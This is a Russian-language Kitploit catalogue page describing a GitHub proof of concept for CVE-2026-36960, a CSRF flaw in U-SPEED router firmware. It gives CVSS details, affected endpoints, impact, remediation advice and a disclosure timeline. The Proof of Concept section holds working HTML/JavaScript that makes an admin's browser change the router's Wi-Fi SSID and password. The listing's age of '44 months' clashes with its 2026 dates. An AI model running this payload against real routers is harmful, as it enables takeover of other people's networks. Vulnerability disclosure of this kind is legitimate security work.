Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kirubel-cve/cve-2026-36960
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

Доказательство концепции эксплойта для CVE-2026-36960, уязвимости CSRF в прошивке маршрутизатора U-SPEED, позволяющей несанкционированное изменение конфигурации с помощью поддельных запросов.

Репозиторий
44 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-36960: Межсайтовая подделка запроса (CSRF) в веб-интерфейсе управления

Идентификатор CVE: CVE-2026-36960 Дата: 2026-04-29 Обнаружил: Kirubel Solomne Производитель: U-SPEED Продукт: Маршрутизатор U-SPEED Версия прошивки: V1.0.0 CWE: CWE-352 — Межсайтовая подделка запроса (CSRF)


Описание

Прошивка маршрутизатора U-SPEED V1.0.0 не реализует механизмы защиты от CSRF, такие как анти-CSRF токены или строгую проверку заголовков Origin/Referer для административных API-эндпоинтов. Злоумышленник может создать вредоносную веб-страницу, которая отправляет поддельные HTTP-запросы к эндпоинтам конфигурации. Если аутентифицированный администратор посетит вредоносную веб-страницу, маршрутизатор обработает запрос как легитимное административное действие.


Оценка CVSS

Оценка CVSS v3.1: 8.8 (Высокая) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

МетрикаЗначение
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемТребуется
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое

Затронутые эндпоинты

ЭндпоинтФункция
/api/setWlanКонфигурация беспроводной сети
/api/telnetКонфигурация службы Telnet
Прочие эндпоинты конфигурацииРазличные административные функции

Доказательство концепции

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Ожидаемое поведение: Запрос должен быть отклонён из-за отсутствия CSRF-токена. Фактическое поведение: Маршрутизатор принимает и обрабатывает поддельный запрос.


Воздействие

  • Несанкционированное изменение конфигурации маршрутизатора
  • Захват WiFi-сети
  • Манипулирование службой Telnet
  • Отказ в обслуживании для легитимных пользователей

Устранение

  • Внедрить анти-CSRF токены на всех эндпоинтах, изменяющих состояние
  • Обеспечить строгую проверку заголовков Origin и Referer
  • Использовать атрибут cookie SameSite=Strict

Хронология раскрытия

ДатаСобытие
2026-04-29Уязвимость обнаружена
2026-04-29Сообщено в MITRE
2026-04-29Присвоен CVE-2026-36960
2026-04-29Публичное раскрытие

Ссылки

  • MITRE CVE-2026-36960
  • CWE-352
  • Веб-сайт производителя
Скачать инструмент